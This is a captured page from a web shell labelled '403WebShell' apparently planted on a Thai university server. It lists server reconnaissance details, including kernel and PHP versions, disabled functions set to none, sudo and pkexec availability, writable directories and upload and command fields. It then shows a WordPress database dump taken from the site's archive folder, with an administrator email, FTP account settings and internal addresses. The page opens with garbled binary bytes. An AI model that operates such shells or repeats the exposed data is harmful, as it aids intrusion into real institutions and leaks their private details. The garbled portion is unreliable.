h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/skruarchives/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/skruarchives/wordpress.sql
-- phpMyAdmin SQL Dump
-- version 4.4.15.10
-- https://www.phpmyadmin.net
--
-- Host: localhost
-- Generation Time: May 27, 2019 at 04:15 AM
-- Server version: 5.7.19
-- PHP Version: 5.4.16

SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
SET time_zone = "+00:00";


/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;

--
-- Database: `wordpress`
--

-- --------------------------------------------------------

--
-- Table structure for table `wp_commentmeta`
--

CREATE TABLE IF NOT EXISTS `wp_commentmeta` (
  `meta_id` bigint(20) unsigned NOT NULL,
  `comment_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) COLLATE utf8_general_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8_general_ci
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `wp_comments`
--

CREATE TABLE IF NOT EXISTS `wp_comments` (
  `comment_ID` bigint(20) unsigned NOT NULL,
  `comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT '0',
  `comment_author` tinytext COLLATE utf8_general_ci NOT NULL,
  `comment_author_email` varchar(100) COLLATE utf8_general_ci NOT NULL DEFAULT '',
  `comment_author_url` varchar(200) COLLATE utf8_general_ci NOT NULL DEFAULT '',
  `comment_author_IP` varchar(100) COLLATE utf8_general_ci NOT NULL DEFAULT '',
  `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_content` text COLLATE utf8_general_ci NOT NULL,
  `comment_karma` int(11) NOT NULL DEFAULT '0',
  `comment_approved` varchar(20) COLLATE utf8_general_ci NOT NULL DEFAULT '1',
  `comment_agent` varchar(255) COLLATE utf8_general_ci NOT NULL DEFAULT '',
  `comment_type` varchar(20) COLLATE utf8_general_ci NOT NULL DEFAULT '',
  `comment_parent` bigint(20) unsigned NOT NULL DEFAULT '0',
  `user_id` bigint(20) unsigned NOT NULL DEFAULT '0'
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `wp_comments`
--

INSERT INTO `wp_comments` (`comment_ID`, `comment_post_ID`, `comment_author`, `comment_author_email`, `comment_author_url`, `comment_author_IP`, `comment_date`, `comment_date_gmt`, `comment_content`, `comment_karma`, `comment_approved`, `comment_agent`, `comment_type`, `comment_parent`, `user_id`) VALUES
(1, 1, 'ผู้แสดงความเห็นเวิร์ดเพรส', 'wapuu@wordpress.example', 'https://wordpress.org/', '', '2019-05-26 01:45:01', '2019-05-26 01:45:01', 'สวัสดี  นี่คือความเห็น\nเพื่อเริ่มการจัดการ  การแก้ไขและลบความเห็น  โปรดเข้าไปที่หน้าจอความเห็นในหน้าควบคุม\nรูปประจำตัวผู้แสดงความเห็นมาจาก <a href="https://gravatar.com">Gravatar</a>', 0, '1', '', '', 0, 0),
(2, 17, 'test', 'tet@kru.ac.th', 'http://rererer', '172.17.166.71', '2019-05-26 12:20:15', '2019-05-26 05:20:15', 'tret', 0, 'post-trashed', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0', '', 0, 0);

-- --------------------------------------------------------

--
-- Table structure for table `wp_links`
--

CREATE TABLE IF NOT EXISTS `wp_links` (
  `link_id` bigint(20) unsigned NOT NULL,
  `link_url` varchar(255) COLLATE utf8_general_ci NOT NULL DEFAULT '',
  `link_name` varchar(255) COLLATE utf8_general_ci NOT NULL DEFAULT '',
  `link_image` varchar(255) COLLATE utf8_general_ci NOT NULL DEFAULT '',
  `link_target` varchar(25) COLLATE utf8_general_ci NOT NULL DEFAULT '',
  `link_description` varchar(255) COLLATE utf8_general_ci NOT NULL DEFAULT '',
  `link_visible` varchar(20) COLLATE utf8_general_ci NOT NULL DEFAULT 'Y',
  `link_owner` bigint(20) unsigned NOT NULL DEFAULT '1',
  `link_rating` int(11) NOT NULL DEFAULT '0',
  `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `link_rel` varchar(255) COLLATE utf8_general_ci NOT NULL DEFAULT '',
  `link_notes` mediumtext COLLATE utf8_general_ci NOT NULL,
  `link_rss` varchar(255) COLLATE utf8_general_ci NOT NULL DEFAULT ''
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `wp_options`
--

CREATE TABLE IF NOT EXISTS `wp_options` (
  `option_id` bigint(20) unsigned NOT NULL,
  `option_name` varchar(191) COLLATE utf8_general_ci NOT NULL DEFAULT '',
  `option_value` longtext COLLATE utf8_general_ci NOT NULL,
  `autoload` varchar(20) COLLATE utf8_general_ci NOT NULL DEFAULT 'yes'
) ENGINE=InnoDB AUTO_INCREMENT=929 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `wp_options`
--

INSERT INTO `wp_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(1, 'siteurl', 'http://172.17.40.11/wp511', 'yes'),
(2, 'home', 'http://172.17.40.11/wp511', 'yes'),
(3, 'blogname', 'จดหมายเหตุ มหาวิทยาลัยราชภัฏสงขลา', 'yes'),
(4, 'blogdescription', 'บันทึกเรื่องราวต่างๆของมหาวิทยาลัยราชภัฏสงขลา', 'yes'),
(5, 'users_can_register', '0', 'yes'),
(6, 'admin_email', 'kobsak.na@skru.ac.th', 'yes'),
(7, 'start_of_week', '0', 'yes'),
(8, 'use_balanceTags', '0', 'yes'),
(9, 'use_smilies', '1', 'yes'),
(10, 'require_name_email', '1', 'yes'),
(11, 'comments_notify', '1', 'yes'),
(12, 'posts_per_rss', '10', 'yes'),
(13, 'rss_use_excerpt', '0', 'yes'),
(14, 'mailserver_url', 'mail.example.com', 'yes'),
(15, 'mailserver_login', 'login@example.com', 'yes'),
(16, 'mailserver_pass', 'password', 'yes'),
(17, 'mailserver_port', '110', 'yes'),
(18, 'default_category', '1', 'yes'),
(19, 'default_comment_status', 'closed', 'yes'),
(20, 'default_ping_status', 'open', 'yes'),
(21, 'default_pingback_flag', '1', 'yes'),
(22, 'posts_per_page', '10', 'yes'),
(23, 'date_format', 'd/m/Y', 'yes'),
(24, 'time_format', 'H:i', 'yes'),
(25, 'links_updated_date_format', 'F j, Y g:i a', 'yes'),
(26, 'comment_moderation', '', 'yes'),
(27, 'moderation_notify', '1', 'yes'),
(28, 'permalink_structure', '', 'yes'),
(29, 'rewrite_rules', '', 'yes'),
(30, 'hack_file', '0', 'yes'),
(31, 'blog_charset', 'UTF-8', 'yes'),
(32, 'moderation_keys', '', 'no'),
(33, 'active_plugins', 'a:1:{i:0;s:33:"classic-editor/classic-editor.php";}', 'yes'),
(34, 'category_base', '', 'yes'),
(35, 'ping_sites', 'http://rpc.pingomatic.com/', 'yes'),
(36, 'comment_max_links', '2', 'yes'),
(37, 'gmt_offset', '7', 'yes'),
(38, 'default_email_category', '1', 'yes'),
(39, 'recently_edited', 'a:2:{i:0;s:63:"/var/www/html/wp511/wp-content/themes/twentyseventeen/style.css";i:1;s:0:"";}', 'no'),
(40, 'template', 'rcg-forest', 'yes'),
(41, 'stylesheet', 'rcg-forest', 'yes'),
(42, 'comment_whitelist', '1', 'yes'),
(43, 'blacklist_keys', '', 'no'),
(44, 'comment_registration', '', 'yes'),
(45, 'html_type', 'text/html', 'yes'),
(46, 'use_trackback', '0', 'yes'),
(47, 'default_role', 'subscriber', 'yes'),
(48, 'db_version', '44719', 'yes'),
(49, 'uploads_use_yearmonth_folders', '1', 'yes'),
(50, 'upload_path', '', 'yes'),
(51, 'blog_public', '1', 'yes'),
(52, 'default_link_category', '0', 'yes'),
(53, 'show_on_front', 'page', 'yes'),
(54, 'tag_base', '', 'yes'),
(55, 'show_avatars', '1', 'yes'),
(56, 'avatar_rating', 'G', 'yes'),
(57, 'upload_url_path', '', 'yes'),
(58, 'thumbnail_size_w', '150', 'yes'),
(59, 'thumbnail_size_h', '150', 'yes'),
(60, 'thumbnail_crop', '1', 'yes'),
(61, 'medium_size_w', '300', 'yes'),
(62, 'medium_size_h', '300', 'yes'),
(63, 'avatar_default', 'mystery', 'yes'),
(64, 'large_size_w', '1024', 'yes'),
(65, 'large_size_h', '1024', 'yes'),
(66, 'image_default_link_type', 'none', 'yes'),
(67, 'image_default_size', '', 'yes'),
(68, 'image_default_align', '', 'yes'),
(69, 'close_comments_for_old_posts', '', 'yes'),
(70, 'close_comments_days_old', '14', 'yes'),
(71, 'thread_comments', '1', 'yes'),
(72, 'thread_comments_depth', '5', 'yes'),
(73, 'page_comments', '', 'yes'),
(74, 'comments_per_page', '50', 'yes'),
(75, 'default_comments_page', 'newest', 'yes'),
(76, 'comment_order', 'asc', 'yes'),
(77, 'sticky_posts', 'a:0:{}', 'yes'),
(78, 'widget_categories', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(79, 'widget_text', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(80, 'widget_rss', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(81, 'uninstall_plugins', 'a:1:{s:33:"classic-editor/classic-editor.php";a:2:{i:0;s:14:"Classic_Editor";i:1;s:9:"uninstall";}}', 'no'),
(82, 'timezone_string', '', 'yes'),
(83, 'page_for_posts', '0', 'yes'),
(84, 'page_on_front', '5', 'yes'),
(85, 'default_post_format', '0', 'yes'),
(86, 'link_manager_enabled', '0', 'yes'),
(87, 'finished_splitting_shared_terms', '1', 'yes'),
(88, 'site_icon', '0', 'yes'),
(89, 'medium_large_size_w', '768', 'yes'),
(90, 'medium_large_size_h', '0', 'yes'),
(91, 'wp_page_for_privacy_policy', '3', 'yes'),
(92, 'show_comments_cookies_opt_in', '1', 'yes'),
(93, 'initial_db_version', '44719', 'yes'),
(94, 'wp_user_roles', 'a:5:{s:13:"administrator";a:2:{s:4:"name";s:13:"Administrator";s:12:"capabilities";a:61:{s:13:"switch_themes";b:1;s:11:"edit_themes";b:1;s:16:"activate_plugins";b:1;s:12:"edit_plugins";b:1;s:10:"edit_users";b:1;s:10:"edit_files";b:1;s:14:"manage_options";b:1;s:17:"moderate_comments";b:1;s:17:"manage_categories";b:1;s:12:"manage_links";b:1;s:12:"upload_files";b:1;s:6:"import";b:1;s:15:"unfiltered_html";b:1;s:10:"edit_posts";b:1;s:17:"edit_others_posts";b:1;s:20:"edit_published_posts";b:1;s:13:"publish_posts";b:1;s:10:"edit_pages";b:1;s:4:"read";b:1;s:8:"level_10";b:1;s:7:"level_9";b:1;s:7:"level_8";b:1;s:7:"level_7";b:1;s:7:"level_6";b:1;s:7:"level_5";b:1;s:7:"level_4";b:1;s:7:"level_3";b:1;s:7:"level_2";b:1;s:7:"level_1";b:1;s:7:"level_0";b:1;s:17:"edit_others_pages";b:1;s:20:"edit_published_pages";b:1;s:13:"publish_pages";b:1;s:12:"delete_pages";b:1;s:19:"delete_others_pages";b:1;s:22:"delete_published_pages";b:1;s:12:"delete_posts";b:1;s:19:"delete_others_posts";b:1;s:22:"delete_published_posts";b:1;s:20:"delete_private_posts";b:1;s:18:"edit_private_posts";b:1;s:18:"read_private_posts";b:1;s:20:"delete_private_pages";b:1;s:18:"edit_private_pages";b:1;s:18:"read_private_pages";b:1;s:12:"delete_users";b:1;s:12:"create_users";b:1;s:17:"unfiltered_upload";b:1;s:14:"edit_dashboard";b:1;s:14:"update_plugins";b:1;s:14:"delete_plugins";b:1;s:15:"install_plugins";b:1;s:13:"update_themes";b:1;s:14:"install_themes";b:1;s:11:"update_core";b:1;s:10:"list_users";b:1;s:12:"remove_users";b:1;s:13:"promote_users";b:1;s:18:"edit_theme_options";b:1;s:13:"delete_themes";b:1;s:6:"export";b:1;}}s:6:"editor";a:2:{s:4:"name";s:6:"Editor";s:12:"capabilities";a:34:{s:17:"moderate_comments";b:1;s:17:"manage_categories";b:1;s:12:"manage_links";b:1;s:12:"upload_files";b:1;s:15:"unfiltered_html";b:1;s:10:"edit_posts";b:1;s:17:"edit_others_posts";b:1;s:20:"edit_published_posts";b:1;s:13:"publish_posts";b:1;s:10:"edit_pages";b:1;s:4:"read";b:1;s:7:"level_7";b:1;s:7:"level_6";b:1;s:7:"level_5";b:1;s:7:"level_4";b:1;s:7:"level_3";b:1;s:7:"level_2";b:1;s:7:"level_1";b:1;s:7:"level_0";b:1;s:17:"edit_others_pages";b:1;s:20:"edit_published_pages";b:1;s:13:"publish_pages";b:1;s:12:"delete_pages";b:1;s:19:"delete_others_pages";b:1;s:22:"delete_published_pages";b:1;s:12:"delete_posts";b:1;s:19:"delete_others_posts";b:1;s:22:"delete_published_posts";b:1;s:20:"delete_private_posts";b:1;s:18:"edit_private_posts";b:1;s:18:"read_private_posts";b:1;s:20:"delete_private_pages";b:1;s:18:"edit_private_pages";b:1;s:18:"read_private_pages";b:1;}}s:6:"author";a:2:{s:4:"name";s:6:"Author";s:12:"capabilities";a:10:{s:12:"upload_files";b:1;s:10:"edit_posts";b:1;s:20:"edit_published_posts";b:1;s:13:"publish_posts";b:1;s:4:"read";b:1;s:7:"level_2";b:1;s:7:"level_1";b:1;s:7:"level_0";b:1;s:12:"delete_posts";b:1;s:22:"delete_published_posts";b:1;}}s:11:"contributor";a:2:{s:4:"name";s:11:"Contributor";s:12:"capabilities";a:5:{s:10:"edit_posts";b:1;s:4:"read";b:1;s:7:"level_1";b:1;s:7:"level_0";b:1;s:12:"delete_posts";b:1;}}s:10:"subscriber";a:2:{s:4:"name";s:10:"Subscriber";s:12:"capabilities";a:2:{s:4:"read";b:1;s:7:"level_0";b:1;}}}', 'yes'),
(95, 'fresh_site', '0', 'yes'),
(96, 'WPLANG', 'th', 'yes'),
(97, 'widget_search', 'a:2:{i:2;a:1:{s:5:"title";s:0:"";}s:12:"_multiwidget";i:1;}', 'yes'),
(98, 'widget_recent-posts', 'a:3:{i:2;a:2:{s:5:"title";s:0:"";s:6:"number";i:5;}i:3;a:3:{s:5:"title";s:0:"";s:6:"number";i:5;s:9:"show_date";b:0;}s:12:"_multiwidget";i:1;}', 'yes'),
(99, 'widget_recent-comments', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(100, 'widget_archives', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(101, 'widget_meta', 'a:2:{i:2;a:1:{s:5:"title";s:0:"";}s:12:"_multiwidget";i:1;}', 'yes'),
(102, 'sidebars_widgets', 'a:9:{s:19:"wp_inactive_widgets";a:4:{i:0;s:8:"search-2";i:1;s:10:"nav_menu-2";i:2;s:14:"recent-posts-2";i:3;s:6:"meta-2";}s:9:"sidebar-1";a:3:{i:0;s:10:"nav_menu-3";i:1;s:14:"recent-posts-3";i:2;s:10:"nav_menu-4";}s:8:"footer-l";a:0:{}s:8:"footer-c";a:0:{}s:8:"footer-r";a:0:{}s:14:"front-footer-l";a:0:{}s:14:"front-footer-c";a:0:{}s:14:"front-footer-r";a:0:{}s:13:"array_version";i:3;}', 'yes'),
(103, 'widget_pages', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(104, 'widget_calendar', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(105, 'widget_media_audio', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(106, 'widget_media_image', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(107, 'widget_media_gallery', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(108, 'widget_media_video', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(109, 'widget_tag_cloud', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(110, 'widget_nav_menu', 'a:4:{i:2;a:2:{s:5:"title";s:24:"เมนูหลัก";s:8:"nav_menu";i:15;}i:3;a:2:{s:5:"title";s:24:"เมนูหลัก";s:8:"nav_menu";i:15;}i:4;a:2:{s:5:"title";s:33:"เข้าสู่ระบบ";s:8:"nav_menu";i:18;}s:12:"_multiwidget";i:1;}', 'yes'),
(111, 'widget_custom_html', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(112, 'cron', 'a:5:{i:1558932302;a:1:{s:34:"wp_privacy_delete_old_export_files";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:6:"hourly";s:4:"args";a:0:{}s:8:"interval";i:3600;}}}i:1558964702;a:3:{s:16:"wp_version_check";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:10:"twicedaily";s:4:"args";a:0:{}s:8:"interval";i:43200;}}s:17:"wp_update_plugins";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:10:"twicedaily";s:4:"args";a:0:{}s:8:"interval";i:43200;}}s:16:"wp_update_themes";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:10:"twicedaily";s:4:"args";a:0:{}s:8:"interval";i:43200;}}}i:1559007932;a:2:{s:19:"wp_scheduled_delete";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:5:"daily";s:4:"args";a:0:{}s:8:"interval";i:86400;}}s:25:"delete_expired_transients";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:5:"daily";s:4:"args";a:0:{}s:8:"interval";i:86400;}}}i:1559008292;a:1:{s:30:"wp_scheduled_auto_draft_delete";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:5:"daily";s:4:"args";a:0:{}s:8:"interval";i:86400;}}}s:7:"version";i:2;}', 'yes'),
(113, 'theme_mods_twentynineteen', 'a:3:{s:18:"custom_css_post_id";i:-1;s:16:"sidebars_widgets";a:2:{s:4:"time";i:1558844920;s:4:"data";a:2:{s:19:"wp_inactive_widgets";a:0:{}s:9:"sidebar-1";a:7:{i:0;s:8:"search-2";i:1;s:10:"nav_menu-2";i:2;s:14:"recent-posts-2";i:3;s:17:"recent-comments-2";i:4;s:10:"archives-2";i:5;s:12:"categories-2";i:6;s:6:"meta-2";}}}s:18:"nav_menu_locations";a:0:{}}', 'yes'),
(123, '_site_transient_timeout_browser_88c258bbc62958bfa437ece813133da1', '1559439913', 'no'),
(124, '_site_transient_browser_88c258bbc62958bfa437ece813133da1', 'a:10:{s:4:"name";s:6:"Chrome";s:7:"version";s:13:"74.0.3729.169";s:8:"platform";s:7:"Windows";s:10:"update_url";s:29:"https://www.google.com/chrome";s:7:"img_src";s:43:"http://s.w.org/images/browsers/chrome.png?1";s:11:"img_src_ssl";s:44:"https://s.w.org/images/browsers/chrome.png?1";s:15:"current_version";s:2:"18";s:7:"upgrade";b:0;s:8:"insecure";b:0;s:6:"mobile";b:0;}', 'no'),
(125, '_site_transient_timeout_php_check_8462d45f6daf8e85ad6e9d4ed429abb8', '1559439914', 'no'),
(126, '_site_transient_php_check_8462d45f6daf8e85ad6e9d4ed429abb8', 'a:5:{s:19:"recommended_version";s:3:"7.3";s:15:"minimum_version";s:6:"5.6.20";s:12:"is_supported";b:0;s:9:"is_secure";b:0;s:13:"is_acceptable";b:0;}', 'no'),
(127, 'can_compress_scripts', '1', 'no'),
(140, '_transient_timeout_plugin_slugs', '1558934439', 'no'),
(141, '_transient_plugin_slugs', 'a:3:{i:0;s:19:"akismet/akismet.php";i:1;s:33:"classic-editor/classic-editor.php";i:2;s:9:"hello.php";}', 'no'),
(142, 'recently_activated', 'a:0:{}', 'yes'),
(146, 'ftp_credentials', 'a:3:{s:8:"hostname";s:9:"localhost";s:8:"username";s:6:"kobsak";s:15:"connection_type";s:3:"ftp";}', 'yes'),
(149, 'current_theme', 'RCG Forest', 'yes'),
(150, 'theme_mods_twentyseventeen', 'a:4:{i:0;b:0;s:18:"nav_menu_locations";a:0:{}s:18:"custom_css_post_id";i:-1;s:16:"sidebars_widgets";a:2:{s:4:"time";i:1558846752;s:4:"data";a:4:{s:19:"wp_inactive_widgets";a:0:{}s:9:"sidebar-1";a:7:{i:0;s:8:"search-2";i:1;s:10:"nav_menu-2";i:2;s:14:"recent-posts-2";i:3;s:17:"recent-comments-2";i:4;s:10:"archives-2";i:5;s:12:"categories-2";i:6;s:6:"meta-2";}s:9:"sidebar-2";a:0:{}s:9:"sidebar-3";a:0:{}}}}', 'yes'),
(151, 'theme_switched', '', 'yes'),
(154, 'new_admin_email', 'kobsak.na@skru.ac.th', 'yes'),
(198, 'nav_menu_options', 'a:2:{i:0;b:0;s:8:"auto_add";a:0:{}}', 'yes'),
(213, 'theme_mods_twentysixteen', 'a:4:{i:0;b:0;s:18:"nav_menu_locations";a:1:{s:7:"primary";i:16;}s:18:"custom_css_post_id";i:-1;s:16:"sidebars_widgets";a:2:{s:4:"time";i:1558852765;s:4:"data";a:4:{s:19:"wp_inactive_widgets";a:0:{}s:9:"sidebar-1";a:4:{i:0;s:8:"search-2";i:1;s:10:"nav_menu-2";i:2;s:14:"recent-posts-2";i:3;s:6:"meta-2";}s:9:"sidebar-2";a:0:{}s:9:"sidebar-3";a:0:{}}}}', 'yes'),
(223, 'theme_mods_twentyfourteen', 'a:4:{i:0;b:0;s:18:"nav_menu_locations";a:1:{s:7:"primary";i:16;}s:18:"custom_css_post_id";i:-1;s:16:"sidebars_widgets";a:2:{s:4:"time";i:1558852837;s:4:"data";a:4:{s:19:"wp_inactive_widgets";a:0:{}s:9:"sidebar-1";a:4:{i:0;s:8:"search-2";i:1;s:10:"nav_menu-2";i:2;s:14:"recent-posts-2";i:3;s:6:"meta-2";}s:9:"sidebar-2";a:0:{}s:9:"sidebar-3";a:0:{}}}}', 'yes'),
(224, 'widget_widget_twentyfourteen_ephemera', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(242, 'theme_mods_openness', 'a:4:{i:0;b:0;s:18:"nav_menu_locations";a:1:{s:7:"primary";i:15;}s:18:"custom_css_post_id";i:-1;s:16:"sidebars_widgets";a:2:{s:4:"time";i:1558844381;s:4:"data";a:6:{s:19:"wp_inactive_widgets";a:0:{}s:14:"sidebar-column";a:7:{i:0;s:8:"search-2";i:1;s:10:"nav_menu-2";i:2;s:14:"recent-posts-2";i:3;s:17:"recent-comments-2";i:4;s:10:"archives-2";i:5;s:12:"categories-2";i:6;s:6:"meta-2";}s:6:"banner";a:0:{}s:11:"breadcrumbs";a:0:{}s:7:"bottom1";a:0:{}s:6:"footer";a:0:{}}}}', 'yes'),
(243, 'widget_openness-recent-posts', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(255, 'theme_mods_twentyfifteen', 'a:4:{i:0;b:0;s:18:"nav_menu_locations";a:1:{s:7:"primary";i:16;}s:18:"custom_css_post_id";i:-1;s:16:"sidebars_widgets";a:2:{s:4:"time";i:1558852736;s:4:"data";a:2:{s:19:"wp_inactive_widgets";a:0:{}s:9:"sidebar-1";a:4:{i:0;s:8:"search-2";i:1;s:10:"nav_menu-2";i:2;s:14:"recent-posts-2";i:3;s:6:"meta-2";}}}}', 'yes'),
(256, '_transient_twentyfifteen_categories', '2', 'yes'),
(260, 'theme_mods_taleem', 'a:4:{i:0;b:0;s:18:"nav_menu_locations";a:1:{s:3:"top";i:15;}s:18:"custom_css_post_id";i:-1;s:16:"sidebars_widgets";a:2:{s:4:"time";i:1558844400;s:4:"data";a:4:{s:19:"wp_inactive_widgets";a:0:{}s:9:"sidebar-1";a:7:{i:0;s:8:"search-2";i:1;s:10:"nav_menu-2";i:2;s:14:"recent-posts-2";i:3;s:17:"recent-comments-2";i:4;s:10:"archives-2";i:5;s:12:"categories-2";i:6;s:6:"meta-2";}s:9:"sidebar-2";a:0:{}s:9:"sidebar-3";a:0:{}}}}', 'yes'),
(264, 'theme_mods_parole-2015', 'a:4:{i:0;b:0;s:18:"nav_menu_locations";a:1:{s:7:"primary";i:15;}s:18:"custom_css_post_id";i:-1;s:16:"sidebars_widgets";a:2:{s:4:"time";i:1558844242;s:4:"data";a:2:{s:19:"wp_inactive_widgets";a:0:{}s:9:"sidebar-1";a:7:{i:0;s:8:"search-2";i:1;s:10:"nav_menu-2";i:2;s:14:"recent-posts-2";i:3;s:17:"recent-comments-2";i:4;s:10:"archives-2";i:5;s:12:"categories-2";i:6;s:6:"meta-2";}}}}', 'yes'),
(269, 'theme_mods_griddist', 'a:4:{i:0;b:0;s:18:"nav_menu_locations";a:1:{s:12:"primary-menu";i:15;}s:18:"custom_css_post_id";i:-1;s:16:"sidebars_widgets";a:2:{s:4:"time";i:1558844284;s:4:"data";a:5:{s:19:"wp_inactive_widgets";a:0:{}s:7:"sidebar";a:7:{i:0;s:8:"search-2";i:1;s:10:"nav_menu-2";i:2;s:14:"recent-posts-2";i:3;s:17:"recent-comments-2";i:4;s:10:"archives-2";i:5;s:12:"categories-2";i:6;s:6:"meta-2";}s:10:"footer-one";a:0:{}s:10:"footer-two";a:0:{}s:12:"footer-three";a:0:{}}}}', 'yes'),
(273, 'theme_mods_garuda', 'a:4:{i:0;b:0;s:18:"nav_menu_locations";a:1:{s:7:"primary";i:15;}s:18:"custom_css_post_id";i:-1;s:16:"sidebars_widgets";a:2:{s:4:"time";i:1558844262;s:4:"data";a:11:{s:19:"wp_inactive_widgets";a:0:{}s:9:"sidebar-1";a:7:{i:0;s:8:"search-2";i:1;s:10:"nav_menu-2";i:2;s:14:"recent-posts-2";i:3;s:17:"recent-comments-2";i:4;s:10:"archives-2";i:5;s:12:"categories-2";i:6;s:6:"meta-2";}s:9:"sidebar-2";a:0:{}s:6:"header";a:0:{}s:8:"footer-1";a:0:{}s:8:"footer-2";a:0:{}s:8:"footer-3";a:0:{}s:8:"footer-4";a:0:{}s:8:"footer-5";a:0:{}s:10:"footer-bar";a:0:{}s:7:"top-bar";a:0:{}}}}', 'yes'),
(278, 'theme_mods_minimal-blocks', 'a:4:{i:0;b:0;s:18:"nav_menu_locations";a:1:{s:11:"primary-nav";i:15;}s:18:"custom_css_post_id";i:-1;s:16:"sidebars_widgets";a:2:{s:4:"time";i:1558844339;s:4:"data";a:6:{s:19:"wp_inactive_widgets";a:0:{}s:9:"sidebar-1";a:7:{i:0;s:8:"search-2";i:1;s:10:"nav_menu-2";i:2;s:14:"recent-posts-2";i:3;s:17:"recent-comments-2";i:4;s:10:"archives-2";i:5;s:12:"categories-2";i:6;s:6:"meta-2";}s:12:"shop-sidebar";a:0:{}s:14:"footer-col-one";a:0:{}s:14:"footer-col-two";a:0:{}s:16:"footer-col-three";a:0:{}}}}', 'yes'),
(279, 'widget_minimal_blocks_tab_posts_widget', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(280, 'widget_minimal_blocks_social_menu_widget', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(281, 'widget_minimal_blocks_author_info_widget', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(283, '_transient_minimal_blocks_categories', '2', 'yes'),
(287, 'theme_mods_inbox', 'a:4:{i:0;b:0;s:18:"nav_menu_locations";a:1:{s:12:"primary-menu";i:15;}s:18:"custom_css_post_id";i:-1;s:16:"sidebars_widgets";a:2:{s:4:"time";i:1558844325;s:4:"data";a:2:{s:19:"wp_inactive_widgets";a:0:{}s:12:"sidebar-main";a:7:{i:0;s:8:"search-2";i:1;s:10:"nav_menu-2";i:2;s:14:"recent-posts-2";i:3;s:17:"recent-comments-2";i:4;s:10:"archives-2";i:5;s:12:"categories-2";i:6;s:6:"meta-2";}}}}', 'yes'),
